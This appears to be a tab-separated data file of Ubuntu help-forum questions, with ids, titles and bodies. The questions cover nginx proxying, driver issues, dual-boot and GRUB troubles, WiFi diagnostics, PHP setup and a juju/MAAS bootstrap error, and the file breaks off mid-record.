516060	problem nginx on ubuntu with nodejs	i 'm trying to make nginx upstream configuration working for ubuntu 14.04 , and make my nodejs app visible from virtual host name . this is my conf file in available-sites under the /etc/nginx upstream myweb { server 127.0.0.1:5000 ; } server { listen 0.0.0.0:80 ; server_name local.myweb.com ; access_log /var/log/nginx/local.myweb.com ; location / { proxy_set_header x-real-ip $ remote_addr ; proxy_set_header x-forwarded-for $ proxy_add_x_forwarded_for ; proxy_set_header host $ http_host ; proxy_set_header x-nginx-proxy true ; proxy_pass http : //myweb/ ; proxy_redirect off ; } } however if i try 0.0.0.0:80 i see nginx , also if i try 127.0.0.1:5000 i see the app itself , but if i try to open local.myweb.com i get server not found error , and logs are empty . any idea what i did wrong so far ?
516061	developer tools	i am pretty new to the world of ubuntu , heard so many great things about it , i decided to test the waters . since i have it installed on a partition of my macbook , i thought it would be a good idea to set it up as a portable workstation , for my courses all my programming professors use windows , so that is my desktop setup with visual studio and aptana . what is your set up like ? what developer tools do you suggest ? thanks !
516062	error message 0xc00000001 while booting windows 8 after installing ubuntu	after i installed ubuntu 14.04 , as i switch on my computer i only receive one message which is : windows boot manager , windows failed to update : status 0xc00000001 what should i do ?
516065	ssh to server with encrypted lvm	i setup ubuntu server 14.04 with encrypted lvm ( static ip address with an entry in my /etc/hosts file ) and would like to ssh to it with my laptop on my local network . the problem is that if i just do : ssh user @ machine-name.local i never get prompted to enter my decryption passphrase and it gives me : ssh : connect to host hostname port 22 : no route to host is there a way around this ?
516067	persistent high-fan speed ubuntu 14.04	i am using a dell inspiron 15r 5520 laptop running ubuntu 14.04 with kernel version 3.13.0-34 generic . since installing the os , i have been having issues with my computer 's fan spinning at its maximum speed for prolonged periods of time . i tried installing tlp , which works sometimes , and i also tried i8kutils but it only turned my fans off . this fan issue occurs more frequently when on ac power , and i cleared the exhaust of dust already . why is this happening ? i am not an advanced linux user , but i am open to any suggestions you have at this point . listening to a fan running at max is annoying . thanks in advance , jordan
516068	which of nvidia drivers shall i use	i am using nvidia binary driver-version 331.38 from nvidia-331-updates ( proprietary ) drivers , but for some reason i have some problems with my display , like i can see sometimes the windows which is behind the one i am working on ( especially using firefox ) . i have checked on the internet , that 's for my gt520m there are drivers nvidia-linux-x86_64-340.32 ( 1 ) . i have a .run file and i am not quite sure how do i install it , or even if i should install it . which drivers , would you reckon i should use ? if it is nvidia-linux-x86_64-340.32 ( 1 ) , how should i install it ?
516074	problem with adduser on new install	i am a noob trying to get an install of ubuntu 14.04 lts up and running on a virtual server on linode . i have not done much on it yet . earlier today i tried to add some users . i was able to add one non-admin test user just fine . i used the command adduser testuser i then wanted to add a test user with admin privileges . i used the command adduser testadminuser sudo did not work . comes back with the error adduser : the user testadminuser does not exist . it almost looks like no sudo groups exist . i used a canned load by the hosting site : i would think it is set up for adding an admin user . i think it is a user error , but am stymied . i did look at /etc/groups , and there is no sudo group . help !
516076	has my ubuntu been deleted ?	i was running ubuntu 12.04 as an only os on my laptop in 250 gb out of 500 gb . i decided to install windows 7 alongside . while installing it , i chose 'unallocated 250 gb ' as a location where to install windows . after installing it , i can not access my ubuntu . i have tried boot-repair by booting from ubuntu liveusb but no result . when i check through disk utility i get this : 250 gb : ntfs 248 gb : unallocated space . 2 gb : unknown does this mean my ubuntu is erased ? is there a way to access my data again ? please help .
516077	virt-manager problem with 14.04.1 iso	i have recently completed an upgrade on my home server from ubuntu 12.04 server to 14.04 server version . i run a number of vms using kvm and virt-manager . i also just upgraded virt-manager to 1.0.1 . i am trying to create a new baseline 14.04.1 instance , and i am having problems creating the intial vm from iso . the install gets stuck and becomes non-responsive at the initial language selection screen when the install process first starts . qemu is installed and i have a running virtual machine which i can clone and otherwise control from virt-manager here are the details : from virt-manager , selecting file : new virtual machine step 1 : selecting `` local install media ( iso image or cd rom ) '' step 2 : using iso image : \home\user\downloads\ubuntu-14.04.1-desktop-amd64.iso ( this download has been check-summed ) . selecting os type : linux and version : ubuntu 13.10 ( saucy salamander ) ( or later ) step 3 : selecting 1024mb ram and 1 cpu ( this is a xeon e3 1230v2 cpu with 8 threads ) step 4 : selecting managed or other existing storage . i click `` browse '' and select an lvm group that has plenty of space ( 26 % used out of 128gb ) i create a new volume of 15gb , and then select this volume to use for the vm . step 5 : i specify the server name , then under advanced options , i select `` specify shared device name '' and enter br0 ( this bridge is previously configured and already being used by other vms . then , i click `` finish '' the vm creates and opens up in a new window . i get the initial ubuntu install `` language '' screen with `` english '' selected . however , at this point it becomes unresponsive . the vm performance is showing the cpu usage at max . otherwise there are no other indications . any ideas here ? it 's been a while since i 've created a vm from an iso . i have been using clones since i first installed 12.04 . thanks !
516079	how to use sd card as primary drive without corrupting superblock ?	i have a netbook which i would like to use with a linux-based distro . the hard drive has been replaced with a sd to sata converter adapter so that i can run everything off of an sd card similar to a rasberry pi . i have had no problem installing { , l , x } ubuntu and arch { , bang } on the sd card , but after installation and reboot , the os and partitions disappear except when installing an arch variant . upon investigation , it seems that the superblock ( s ) become corrupted upon reboot and the partitions becomes unrecoverable in this case . i've tried recovering the partitions using the alternate superblocks with no success . my question is : what does arch and archbang do out of the box that { , l , x } ubuntu do n't do that causes this problem and how can i modify { , l , x } ubuntu so that i can safely use them as an os when booting from an sd card ? i suspect that it has something to do with the sd card not being unmounted cleanly on shutdown , but i 'm sure how to compare the shutdown procedures .
516080	mirroring 12.04 vps server to another vps server	i 'm a new linux user so i 'll need a hand in this . i have a 12.04 server that i want a mirror image of on another vps . i was reading a bit on rsync but i am unsure of the command to put in to copy over everything on the server to the new machine .
516081	remember touchpad state after reboot	i usually use an external pointing device with my laptop and the first thing i do upon logging into the laptop is to press the laptop 's function key to disable the touchpad . i seem to recall previous versions of ubuntu saving the touchpad state across shutdowns/reboots . i would like the state of the touchpad to remain until i change it again using the laptop 's enable/disable touchpad function key . is there a way to accomplish this using the existing laptop function key ? my laptop is a lenovo ideapad y510p and fn-f6 is it 's disable/enable touchpad button .
516084	ubuntu download will not boot on restart	i downloaded both 32-bit and 64-bit ubuntu , then used startup disk creator to create a bootable usb stick . got the same result with each . would not boot on startup . i then ran autorun with prompt . same answer on each . error message stated can not find autorun file . my computer is a hp model p6203w . if i have to i will purchase the cd , will the 64-bit cd work on my machine ? i would rather download , the program .
516085	where are packeges from ubuntu software center downloaded to ?	the location of the downloaded/installed programs and packages from software center ?
516088	how does ubuntu get away with reading fat32	i read here that microsoft makes $ 5 to $ 15 on every android device sold because android can read the fat filesystem . ubuntu can also read the fat filesystem but no payment history to microsoft exists . what is the difference ?
516092	failed to load session ubuntu and to fetch .archive.ubuntu.com	i was downloading some updates like almost every day and a message about some files to remove or replace i think ( i 'm not sure ) that i 've accepted to replace without knowing i confess what is it about , i had to restart pc to windows 7 for something and forgetting that downloads and installations on ubuntu were not finished.. the result after comeback to ubuntu ( 12.04 ) is the message : failed to load session ubuntu and lower graphics both two sessions and after accepting my password , ca n't us my mouse i was searching in ubuntu by windows some answers and i 've tried in terminal after starting pc : sudo apt-get update sudo apt-get install ubuntu-desktop sudo apt-get install -f install sudo dpkg-reconfigure ubuntu-desktop sudo reboot and : sudo apt-get update sudo apt-get install unity-2d sudo apt-get install ubuntu-desktop sudo apt-get install compizconfig-settings-manager sudo apt-get install compiz-plugins-extra sudo apt-get update and : sudo apt-get install gnome-session sudo apt-get install lightdm sudo apt-get install unity-greeter sudo dpkg-reconfigure lightdm and : sudo apt-get install ubuntu-session and : purge/install gnome-session and : gnome-accessibility-themes and : apt-get upgrade and many others i forget but always fail in the end by : enable to fetch dz.archive.ubuntu.com i could n't find something satisfying in launchpad about replacing my archive source and it was a little hard for me to understand.. i 'm in 12.04 lt 's since 2 years and months , that the first prob like that . hope you help me .
516095	installing adobe air ubuntu 14.04 lts	when i try to install adobe air on my ubuntu 14.04 it pulls up the adobe window and i accept terms and services but then a small grey and white terminal type window pops up and asks for root password.i have entered my log in password but it does nothing i habe not set up a root password ... ... what do i do ? i appreciate all answers .
516096	ca n't boot from usb ; no selection option in grub ; usb 1st boot choice	first , i have looked through the suggested questions that may have an answer , but nothing seems on point . i have a dual boot ubuntu 14.04/windows 7 system . i have decided to play around with some other distros and loaded one onto a usb stick with unetbootin . it wo n't boot . when the grub selection menu comes up , there is no `` new '' option to boot from the usb , unlike the previous grub when i was running 12.04 . the usb is selected as first priority boot , the cd drive second , and the hard drive 3d in bios . any suggestions ?
516100	how is it that the size of ubuntu core grew so much between 13.10 and 14.04 ?	i noticed that the download size of ubuntu core almost doubled for the amd64 version between release 13.10 38m and 14.04 63m . the untarred `` minimal '' rootfs file system size did grow from 119m to 209m . measured using du -ch ./**/* how does this come ?
516102	14.04 desktop : static ip is acquired , ping works , dns does not	my question is very similar to this one : can ping but no dns i have setup a static ip on my previous ubuntu versions - 9.04 and 12.04 - without issue . i have used an identical means this time as well . namely manually editing the /etc/network/interfaces file to set the static ip . my router has the ip reserved for this machine . the machine acquires the desired static ip ( i now get the networking issues message and extra 60 second wait at reboot ) . i can ping the router and 8.8.8.8 but i can not look anything up . i can not use curl with a domain name like google.com . my windows laptop does not see it but i can access it by going to the designated static ip . i tried using nslookup as suggested in the referenced question but the timed out without reaching any servers .
516103	drive unmounts when i try to scan it for viruses	i have an old hard drive from a friend that i 'm trying to get data off of to transfer to a new computer . first , thought , i wanted to scan it for viruses . so i connected it to my lubuntu computer with an ide ( i think -- it 's from the windows 2000 era ) to usb connector and it successfully mounted . i can browse the file system . but every time i try to scan it for viruses it unmounts and remounts . i 've tried both clamav and comodo and it does the same thing . anyone know what 's going on ? update : it does the same thing if i try to copy a lot of files too . but i can can get a small word document off of it no problem ...
516105	where is the skeleton thunar.xml ?	i am using xubuntu 14.04 . i understand that when a user logins in for the first time several files in ~/.config/xfce4/xfconf/xfce-perchannel-xml are created including thunar.xml . my question is where do these basic files come from ? it appears that in /etc/xdg/xdg-xubuntu/xfce4/xfconf/xfce-perchannel-xml are perhaps the base files , but these do n't match what 's in the user .config directory and if i change them , new users do n't get the new versions by default . i 'd like to know because i 'm trying to change some default settings to hide network drives and mounted devices . i can easily change it in the gui on a per user basis but i 'd rather setup a default that hides these things . thank you
516106	ubuntu 14.04 sli flicker	i keep getting a lot of flickering and artifacts the moment i enable sli.tried updating the nvidia drivers.but the problem remains.is there a possible fix or work around ? i 'm running gtx 760s . thanks
516107	multi-booting from mulit-hard drives	hello and thank you in advance for reading this message . i was not able to find an answer in the forum and while i 'm fairly certain that someone else has had to have experienced this problem in the past , since i ca n't find the resolution , i figured it best to post the question and see where it goes . okay , so , to the point ... i have 3 hard drives on my system . one has windows 8.1 pro , one has windows 7 pro and the 3rd ( now ) has ubuntu 14 . i am new to linux so i 'm going to be learning this operating system as i go but before i get started , i want to try and make things a little more comfortable for me as i acclimate myself to the different technology . initially , i installed ubuntu ( 4 days ago ) and got a `` grub recovery '' problem that i did n't understand and could find a resolution for so i removed ubuntu from the 3rd hard drive , repaired my windows ' installations by performing a few bootrec procedures and am now back to my windows multiboot preferred state . i also disconnected ( physically since doing it in the bios did n't work ) my 2 windows hard drives and performed a clean install of ubuntu on the 3rd hard drive ... i now have all 3 drives plugged in and my dualboot for windows is working fine , but i do not get the choice to boot to linux , i only get the window 's options in the multiboot and i would like to know how ( if i can ) to set up the multi-boot so linux becomes one of the options . if it is not possible , i can always turn off the other 2 drives in the bios and simply work it that way , but i would prefer not to ... also , i would like to know if it is possible to make a few changes to ubuntu so it has a more replicated feel of windows ( again , while i acclimate myself to the new system ) . things like , creating a task bar with a 'start menu ' kinda of thing so i can more easily navigate to my programs ... ... the reason for this request is because i installed `` playonlinux '' ( a wine based program ) that is supposed to allow me to run a couple windows games that i like to play but i ca n't figure out how to find it , open it or run it and i assume that 's because i do n't know how to use the ubuntu system ... so - long story short ( and yes , i do apologize for the lengthy message , but the thingy at the top says the more info the better ... lol ) , anyway ... what i 'm trying to do is `` add '' ubuntu to my windows 8 multiboot options and create a friendlier 'visual ' concept to the actual platform ... again , thank you for taking the time to read this message .
516110	installing ubuntu 14.04 32-bit without dvd or usb , just cd	is there a way to create a single or multi cd ubuntu 14.04 32 bit install disk from windows 7 instead of a dvd or usb ? i have an older dell pentium4 machine w/ no dvd and it ca n't boot to usb . currently running debian ( classic ) , but i would like to try ubuntu . i 'm a novice to linux .
516111	`read-only file system` error using tab completion , and terminal window closing randomly	first is simply an oddity with the command cd . if i type in cd , then a space , then press tab to view the available directories , i get this error message : bash : can not create temp file for here-document : read-only file system the more troublesome issue has been random closings of the terminal window . it has happened while testing the cd oddity , and also while ssh 'd into another server doing simple things like `` git status '' and such . [ edit ] it seems if i press enter 31 times it triggers the auto closing of the terminal window . verified 3 times now , exactly 31 times . i recently upgraded from 12.04 to 14.04 late last week , and this behavior did not occur the entire day i used it after upgrading . this is the first time attempting anything on this computer since that day . please advise any other information i can provide , and what i need to do to resolve this .
516112	logins getting stuck on wallpaper after ubuntu 14.04 base and security update ( but not when logging in as guest )	as the title says , after an update sometime last week , logging into my user account only gets as far as changing the background from the login screen 's standard to my personal wallpaper . no dashboard or anything else appears : i can only move my mouse pointer around and fruitlessly make selection boxes and right-clicks . there are many questions with similar problems and i have tried all of the following already ( in order ) : i went into a terminal with ctrl+alt+f1 and ran apt-get update and apt-get upgrade to upgrade 8 packages i had which were still marked as uninstalled . they seem to have installed successfully but the problem persisted after a reboot . i then tried installing compiz-settings manager as per the instructions at unity does n't load , no launcher , no dash appears and using it to re-enable the unity plugin . still no noticable change after a reboot . i have also tried uninstalling and reinstalling lightdm , ubuntu-desktop and unity via the terminal , also with no noticable changes after a reboot . i renamed my .xauthority file so that a new one would be created as per the instructions at ubuntu gets stuck in a login loop . that also did not solve the problem . the xauthotity file is owned by me . it does n't look like there is anything wrong in my .profile file either . lastly , i found a suggestion on one of these many similar threads that i should disable the desktop icons . i ran some command in the terminal to the effect of `` gnome show-icons false '' and after that for some reason the wallpaper does n't even appear now and when i tried to reverse the change by running the command again with the value `` true '' instead of false i got an error message to the effect of `` unable to change '' due to permissions or settings or something . important points : i am able to login as a guest with absolutely no problems at all , which suggests to me that this is not the result of a graphics driver problem . i freshly installed ubuntu 14.04 ( 64-bit amd ) around the end of may : this was not an upgrade from an old version . i have had no problems until now . i would greatly appreciate any assistance which you could provide . update : 08-30-2014 after a week , i logged back into a terminal and performed some more apt-get updates and upgrades , still to no avail , but i was able to make a new user account within the terminal and log in using the new account with little more than a slight delay ! i have already checked/removed my old .xauthority and .profile files to make sure that they are not the problem , and i do not know what other user-specific information may be causing this . if no one can help me find the source of this problem , i would also appreciate any suggestions as to an easy way to migrate my data over to my new , working account from my old one . for example , my applications , my software , my virtual machine , etc . any help would be greatly appreciated .
516113	takes multiple boots to load	as a preface , i am very new to linux/ubuntu and very new to working a computer that sometimes requires terminal functions . i loaded ubuntu as a clean install on a lenovo ideapad u510 that would no longer load into windows 8 and was blue-screening . ubuntu was working fine for about the first week , but i 've had to reinstall three times due to taking multiple tries to actually boot into the operating system and getting a variety of errors . sometimes it 'll load to a black screen with a purple border , sometimes it 'll just load into what i believe is gnome and stay there , and sometimes it 'll just stay stuck on a purple screen . i 've tried booting into recovery mode several times and that 's usually what gets me to actually log in . it could be the hardware , in which case i can send my laptop in for repairs , but if there 's a fix on the os end , i 'd love some help . the error i had before re-installing the os was `` error : enviroment block too small '' . i have n't gotten any error messages this round , but it still takes multiple boots for me to install . ubuntu is the only os on my system so i 'm not dual-booting . i 'm really enjoying this system , but this problem is troublesome . thanks for any help !
516114	brightness change freezes ubuntu with noveau and nvidia drivers	both nvidia and noveau were working fine before my bios update and now they both crash when i change the brightness . integrated still works fine with brightness and i 've tried several nvidia drivers with no change . any help would be greatly appreciated , i am not sure where to start .
516115	text editor that updates file without prompting	is there any console- or window-based text editor that automatically reloads file changed on disk without prompting anything ?
516122	what is your tlp configuration ?	i 'm searching for a way to extend my battery life . and i found tlp . i 'm still not really sure is this tlp works . can anyone tell how can i know if this tlp works in my laptop ? if you do custom your tlp configuraiton , do you mind share it here ? imho it 'll help a lot of people who struggiling with their battery life .
516123	php not running on ubuntu 14.04	os : ubuntu 14.04 apache2 : 2.4.7 php : 5.5.9 i 've just made a fresh install a few days ago . then install lamp , set up apache virtual hosts , etc . everything seem to be running fine ... except for php . phpinfo ( ) works ok , but that 's it . any other *.php just give me a blank page , regarless whether it is right at /var/www/html/ or in a virtual host . it seems that i need to enable php somewhere , for the past few days i 've read every post i could find but nothing seems to work . i appreciate if anyone could point me in what direction to look .
516127	realtek rtl8723be wifi and bluetooth 14.04	i just installed the os on my laptop and at first wifi did n't work . after connecting to ethernet and updating everything , the wifi is working . but it disconnects here and there and requires me to reload the service or reboot . the bluetooth on the card does not work at all . it is seen and hciconfig shows an address for it . however , i can not find bluetooth devices with it . i have seen a lot of different posts with this card but most of them are older . where can i go from here .
516128	how do i use a hardware switch for wifi , in ubuntu server ?	i have been struggling with getting my wifi card working under ubuntu server 14.04 all week , and i finally tried installing with a desktop environment today ( xfce . ) needless to say , i got it working pretty quickly . it was easy to discover for certain that my hardware switch was infact the problem , and once i pressed the appropriate keys , the wifi card turned on . but this did not happen when i did n't have a desktop environment . so what gives ? i do n't want a desktop environment on my server !
516129	package can not be repair	the following packages have unmet dependencies : libnss3-nssdb : depends : libnss3 ( = 2:3.15.4-1ubuntu7 ) but 2:3.16.3-1ubuntu1 is installed i am trying to do a repair , but it 's can not be , any idea ? because i am following by http : //www.omgubuntu.co.uk/2014/08/netflix-linux-html5-support-plugins
516131	problems with shortcuts in the unity tweak tool	i 'm having problems with my ubuntu 14.04 ( unity ) . i configured shortcuts corners several times , however , they do not work . especially , the shortcut `` show desktop '' belonging to docky . i 'm using the `` unity tweak tool '' and do n't have compiz installed . what 's going on ?
516134	use ubuntu network share for apple timemachine backups ?	i want to backup my mac to a network drive mounted on my ubuntu computer ? how do i set this up ?
516140	ubuntu is my default os , how do i install windows 7	my default os is ubuntu 14.04 lts . i realise now that need to run certain windows software that can not run in the ubuntu environment . how can i install windows 7 , so that i have a dual boot ? i have tried searching for on the web for solutions but most point towards people who already have windows as the default os and want to install ubuntu , not the other way around .
516141	ubuntu installation - install ubuntu alongside windows-7 not displaying	i have been using ubuntu for a few years . recently my laptop hdd crashed and i had it replaced . now i have installed windows 7 ( home 64 ) - the same was installed on the previous hdd . i have also been using a multi boot option with windows 7 and ubuntu . after the installation of windows 7 , i tried to install ubuntu as usual . normally we are getting `` install ubuntu alongside windows7 '' option for multi boot . now its not showing that option . its showing as `` install ubuntu inside windows '' and the cd is coming out from the drive and restarting the system . how do i install ubuntu alongside windows 7 ?
516144	open source web based inventory	i 'm currently looking for an opensource web based inventory . i saw a few like glpi and ocs inventory ng but do n't have much idea about it as i have not used one before . please give your suggestions . my requiremets : a simple and easy to use inventory .
516145	ubuntu boots to black screen or blinking cursor	i know this looks like a dupe , but i 've tried every solution i could find in any other thread . i 'm trying to install ubuntu 14.04 . i 'm planning to install in a dual-boot configuration with windows 8.1 . i 've tried installing from both a live cd and live usb and both end in the same result . after seeing the purple screen with the person and keyboard , the computer hangs either on a screen with a blinking cursor or a totally black screen . i 've tried using the nomodeset , acpi=off and alcpi settings without changing the results . booting with `` no splash '' provides the same results . i 've tried disabling everything in my bios settings that refers to uefi with no change in the results . i also have the same results when i try and boot a live cd/usb of elementaryos or linux mint . my computer has an asrock z77 extreme6 motherboard and an nvidia gtx 680 graphics card . i 'm happy to provide any additional relevant information .
516146	how to really fix ubuntu after a botched upgrade	i have done a distribution upgrade from 12.04 to 14.04 . although it finished and things are running i have some issues : system does not recover from suspend mode , i have to restart the multiscreen feature is missing , i only have 1 screen at startup i have some apport and gtk-root system errors , for which i can only find supressing , not fixing techniques . when i do this i get this error $ sudo dpkg -- configure -a no talloc stackframe at ../source3/param/loadparm.c:4864 , leaking memory any suggestions ?
516148	unable to access my hard disks	i 'm new to ubuntu and still figuring out the whole os . tried accessing my hard drives and this is what keeps showing up ! error mounting /dev/sda7 at /media/hellzvenom/workdesk : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda7 '' `` /media/hellzvenom/workdesk '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda7 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . would appreciate some help..
516149	run terminal command ( python command ) at start up	new to ubuntu , but have looked everywhere to get this question answered . found no solution so far . basically i need to run two terminal commands on startup , which follow each other directly . this will allow me to open a python script on start up . the script works when opened manually , but i 'm at a loss to get it to work on boot . in terminal i type : cd /directory/with/python/script/ python name.py the script works , but i 'm having trouble getting it to run on boot .
516152	ca n't see the right part of my screen	i have awesome window manager in ubuntu 14.04 . today i booted my computer , and i ca n't see about 200 pixels of the right part of my screen , like it 's not there , i can move my mouse past my screen and click but ca n't see anything there . i did n't change any part of the config , and i tried revertnig to the default settings , but the problem still presists . i tried changing the resolution to 1024x768 and then back to 1920x1200 , but it did n't change to 1024x768 so it 's weird ... what is going on and how do i fix it ? edit : screenshot : oh , i wanted to post a screenshot of the problem , but when i screenshot it takes the picture as it should .
516153	juju bootstrap environment fails	i have a problem during deploying my first juju environment `` maas '' . the host is commissioned by maas but during the juju deployment there is this error : setting up libtcmalloc-minimal4 ( 2.1-2ubuntu1 ) ... setting up libgoogle-perftools4 ( 2.1-2ubuntu1 ) ... setting up libsnappy1 ( 1.1.0-1ubuntu1 ) ... setting up juju-mongodb ( 2.4.9-0ubuntu3 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6.1 ) ... curl : ( 22 ) the requested url returned error : 503 service unavailable tools from http : //172.19.202.71/maas/api/1.0/files/ ? key=0b492b0c-2ce4-11e4-9494-525400f28eaf & op=get_by_key downloaded : http 503 ; time 74.994s ; size 0 bytes ; speed 0.000 bytes/s 2014-08-26 06:00:43 error juju.provider.common bootstrap.go:123 bootstrap failed : rc : 1 stopping instance ... 2014-08-26 06:00:43 info juju.cmd cmd.go:113 bootstrap failed , destroying environment 2014-08-26 06:00:43 info juju.provider.common destroy.go:14 destroying environment `` maas '' 2014-08-26 06:00:44 error juju.cmd supercommand.go:300 rc : 1 i use ubuntu 14.04 in a kvm environment . my environments.yaml looks like : environments : maas : type : maas maas-server : 'http : //172.19.202.71/maas' maas-oauth : 'zj9glgqsvswdz6exet : ajcdjrwgs26jsbwhp8 : gpwhclf6p2ajch3mcgl2vrqhbsvkwrgb' admin-secret : 'my-password' default-series : trusty http-proxy : http : //172.19.202.70:8000 https-proxy : https : //172.19.202.70:8000 no-proxy : localhost,172.19.202.0/24 bootstrap-timeout : 1800 does someone know this problem ? greets
516155	installing logger pro on 12.04 lts over crouton	i 'm running ubuntu 12.04 lts 32 bit on my acer c720 chromebook over crouton unity . i 'm trying to install vernier 's logger pro but failing horribly . the application simply does n't start when i double click on the logger pro icon . it just loads and then nothing happens . i downloaded the .deb package files from their website and installed first the drivers , rebooted , then logger pro , rebooted and it did n't work . what am i doing wrong ? i know for a fact that it 's not an issue with vernier 's software , as my physics teacher managed to install it , however he forgot how he did it . edit : most definetely related : http : //www.vernier.com/forums/logger-pro-linux/234-logger-pro-silently-fails-on-chromebookcrouton-ubuntu-1204/
516160	how to install ti calculator	i have seen this question and i have downloaded ti calculator . but now how after extracting the file how to install it .
516161	location to edit xdebug.max_nesting_level in ubuntu 14.04 php using lighttpd	i am getting fatal error maximum function nesting level of '100 ' reached aborting.. it seems i have to edit xdebug.max_nesting_level from 100 to more . but i am unable to find the correct file in where i should edit this ? i am using ubuntu 14.04 , lighttpd webserver and php.. from internet i saw i have to edit php.ini file in /etc/php5/apache2.. but i am using lighttpd . in my /etc/php5/ there are three folders namely cgi cli mods-available in the cgi and cli folder there are php.ini file , but those 2 files did not contain anyting to edit xdebug . in mods-available folder i got 1 file namely xdebug.ini and it just contains zend_extension=xdebug.so so i need help how to edit xdebug.max_nesting_level in ubuntu 14.04 php and lighttpd . sorry for my bad english . seeking your help to solve this
516164	wifi not working in ubuntu 14.04 all of a sudden	my wifi is not detecting any wifi connections although they are present . as soon as i start my system network disconnected notification shows up . but it happens to work sometime and it is quiet strange . also there is no option to enable wifi in the wifi options like it is for enable networking . other people also have reported similar issues : suddenly stopped showing my wifi in ubuntu 14.04 in the list in dell inspiron 5420 ? i have run the diagnosis at my wireless/wifi connection does not work . what information is needed to diagnose the issue ? below is the report : # # # # # # # # # # wireless info start # # # # # # # # # # report from : 26 aug 2014 12:37 ist +0530 script from : 17 aug 2014 02:46 utc +0000 # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux parameters : ro , quiet , splash , vt.handoff=7 # # # # # desktop # # # # # ubuntu # # # # # lspci # # # # # 00:19.0 ethernet controller [ 0200 ] : intel corporation ethernet connection i218-lm [ 8086:155a ] ( rev 04 ) subsystem : dell device [ 1028:05de ] kernel driver in use : e1000e # # # # # lsusb # # # # # bus 001 device 004 : id 8087:07dc intel corp . bus 001 device 003 : id 0424:2514 standard microsystems corp. usb 2.0 hub bus 001 device 002 : id 8087:8000 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 002 : id 0461:4d51 primax electronics , ltd 0y357c pmx-mmoczul ( b ) [ dell laser mouse ] bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no # # # # # lsmod # # # # # dell_wmi 12761 0 sparse_keymap 13948 1 dell_wmi wmi 19177 1 dell_wmi # # # # # interfaces # # # # # auto lo iface lo inet loopback # # # # # ifconfig # # # # # eth0 link encap : ethernet hwaddr < mac addr eth0 > inet addr:10.0.0.53 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : fe80 : :eef4 : bbff : fe19 : f33c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:328153 errors:0 dropped:0 overruns:0 frame:0 tx packets:188224 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:30083070 ( 30.0 mb ) tx bytes:14284753 ( 14.2 mb ) interrupt:20 memory : f7f00000-f7f20000 # # # # # iwconfig # # # # # eth0 no wireless extensions . lo no wireless extensions . # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.0.0.1 0.0.0.0 ug 0 0 0 eth0 10.0.0.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 search web2labs.com # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : eth0 [ ethernet connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : wired driver : e1000e state : connected default : yes hw address : < mac addr eth0 > capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on ipv4 settings : address : 10.0.0.53 prefix : 24 ( 255.255.255.0 ) gateway : 10.0.0.1 dns : 10.0.0.1 # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 6 , 20 ) ( 2457 - 2482 @ 40 ) , ( 6 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 6 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 160 ) , ( 6 , 20 ) , passive-scan , no-ibss ( 5250 - 5330 @ 160 ) , ( 6 , 20 ) , dfs , passive-scan , no-ibss ( 5490 - 5730 @ 160 ) , ( 6 , 20 ) , dfs , passive-scan , no-ibss # # # # # iwlist channels # # # # # eth0 no frequency information . lo no frequency information . # # # # # iwlist scan # # # # # eth0 interface does n't support scanning . lo interface does n't support scanning . # # # # # module infos # # # # # # # # # # module parameters # # # # # # # # # # /etc/modules # # # # # lp rtc acpiphp # # # # # blacklists # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist-bcm43.conf ] blacklist b43 blacklist b43legacy blacklist ssb blacklist bcm43xx blacklist brcm80211 blacklist brcmfmac blacklist brcmsmac blacklist bcma [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/blacklist-i915-hsw.conf ] blacklist i915_hsw # # # # # udev rules # # # # # [ /etc/udev/rules.d/70-persistent-net.rules ] # pci device 0x8086:0x155a ( e1000e ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac addr eth0 > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x8086:0x08b1 ( iwlwifi ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # usb device 0x:0x 